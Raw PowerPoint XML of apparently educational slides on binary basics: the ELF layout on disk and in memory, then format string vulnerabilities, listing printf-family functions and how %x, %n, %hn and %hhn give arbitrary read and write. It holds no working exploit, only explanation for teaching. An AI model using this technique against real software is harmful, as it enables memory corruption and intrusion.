              <a:ext cx="358500" cy="6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31" name="Shape 761">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96561190-968D-465E-B74B-FCFE807386CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4362050"/>
              <a:ext cx="1047000" cy="27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Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x00000000</a:t>
              </a:r>
              <a:endParaRPr sz="1000"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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 762">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D6AF9C-5930-4157-B3CD-59F50CF4CC9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="2570571"/>
            <a:ext cx="1762768" cy="597979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other sections</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 763">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01A4FC4-9A21-43E3-9524-362A2AAED8C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="3143271"/>
            <a:ext cx="1762768" cy="286303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.data</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 764">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E22253-626D-4699-B651-710FA5240417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="3417471"/>
            <a:ext cx="1762768" cy="286303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.bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 765">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D55B9A-073A-4EF4-BDA4-4F9B7D4A26C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="3691671"/>
            <a:ext cx="1762768" cy="286303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.got.plt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 766">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{204E7B2E-696E-47C2-8A5F-F13B877F31EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="3965871"/>
            <a:ext cx="1762768" cy="286303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.rodata</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 767">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C86299-3DCD-4BF7-9315-C5F6009304BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="4240071"/>
            <a:ext cx="1762768" cy="286303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.text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 768">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622F611F-DB18-4938-B443-5F61B8BF9D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="4514271"/>
            <a:ext cx="1762768" cy="286303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.init</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 769">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53626037-B023-4273-8188-3B29C3ED9372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="4788471"/>
            <a:ext cx="1762768" cy="286303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ELF Header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 770">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96FAD1E-CDF1-4579-B03E-C1F4C9C64729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754731" y="3143270"/>
            <a:ext cx="369310" cy="831198"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 45447"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050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Shape 771">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27330B4C-CC35-4AEE-AB8C-580A43F7E0AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754731" y="3974467"/>
            <a:ext cx="369310" cy="1100307"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 45447"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="1155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2" name="Shape 772">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CE0112-144D-44E6-81AB-F45B02885F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="1"/>
            <a:endCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124041" y="4474524"/>
            <a:ext cx="1263973" cy="1087558"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="1155CC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3" name="Shape 773">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB1F4525-A453-4CB0-8FA8-E20B4FF2C42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="1"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124041" y="3521025"/>
            <a:ext cx="1263973" cy="1754753"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6AA84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4" name="Shape 774">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF84555E-43AF-4C10-A609-A8F7CD72C922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2289488" y="3417471"/>
            <a:ext cx="611383" cy="2863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RW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5" name="Shape 775">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2644DF09-4943-407B-908F-35D561F70633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2289489" y="4377171"/>
            <a:ext cx="544270" cy="2863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RX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6" name="Shape 776">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AF69B0-A968-4036-8F85-C3A7FD1B533C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214563" y="2217571"/>
            <a:ext cx="1187075" cy="2863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In Disk</a:t>
            </a:r>
            <a:endParaRPr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7" name="Shape 777">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73658F59-0947-4322-A8F5-8BC71C1930F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6542988" y="2217571"/>
            <a:ext cx="1462508" cy="2863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In Memory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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48" name="Shape 778">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{638AD9FC-6BE1-45E1-838C-0A9F2D16A17A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8150459" y="5114171"/>
            <a:ext cx="1817466" cy="286303"/>
            <a:chOff x="6260750" y="4058550"/>
            <a:chExt cx="1405500" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Shape 779">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E879E40D-B995-43C7-8901-3A20C336D541}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4058550"/>
              <a:ext cx="1047000" cy="27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Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x08049000</a:t>
              </a:r>
              <a:endParaRPr sz="100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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="50" name="Shape 780">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0773BA1-C2A0-4399-B456-43D22061529C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500"/>
              <a:ext cx="358500" cy="6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56B4DE75-4A4A-40CE-AC81-B3599F888E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933998" y="5167594"/>
            <a:ext cx="198002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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –s elf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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F9B794B-0741-40A7-B070-5D0F74F32BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="6101357"/>
            <a:ext cx="242887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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ cat /proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/maps</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Shape 773">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF8CB4B-B2C7-4006-847E-0BE62EAF9FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="46" idx="3"/>
            <a:endCxn id="47" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4401638" y="2360723"/>
            <a:ext cx="2141350" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom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3" name="矩形 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE82D1DB-DD7B-4784-89C6-1029D9C46ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4987244" y="1981599"/>
            <a:ext cx="97013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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ ./elf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1FE90358-DA20-4011-AA0F-9377CF97F200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| Linux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下的可执行文件格式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ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1775682971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" name="Shape 2048"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="Shape 2049"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1792288"/>
            <a:ext cx="11360150" cy="4554537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/>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Discovered and public since June 1999</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shocked the security community in the second half of 2000(influenced lots of programs)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Format String Attacks, Newsham (2001)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use %x and %n to achieve arbitrary read and write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4" name="Shape 2054"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Vuln Discovered(year2000)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2055" name="Shape 20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6967" y="1651467"/>
            <a:ext cx="11138067" cy="493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0" name="Shape 2060"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String related Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Shape 2061"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• fprintf — prints to a FILE stream</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• printf — prints to the ‘stdout’ stream</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• sprintf — prints into a string</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• snprintf — prints into a string with length checking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vfprintf — print to a FILE stream from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vprintf — prints to ‘stdout’ from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vsprintf — prints to a string from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vsnprintf — prints to a string with length checking from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• setproctitle — set argv[]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• syslog — output to the syslog facility</a:t>
            </a:r>
            <a:endParaRPr/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6" name="Shape 2066"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String syntax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2067" name="Shape 2067"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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buChar char="-"/>
            </a:pP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%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>  print null terminated string pointed by arg pointer</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pP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%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>  print hex value of the arg (arbitrary read)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pP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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>  store the bytes_written to location pointed by arg pointer</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pP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%hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> - store 2 bytes (short integer)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pP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%hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> - store 1 byte</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pP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%&lt;positive integer&gt;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>  print arbitrary count of chars controlled by integer</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Example: </a:t>
            </a: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%123c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (filled by space)    </a:t>
            </a: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%0512c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
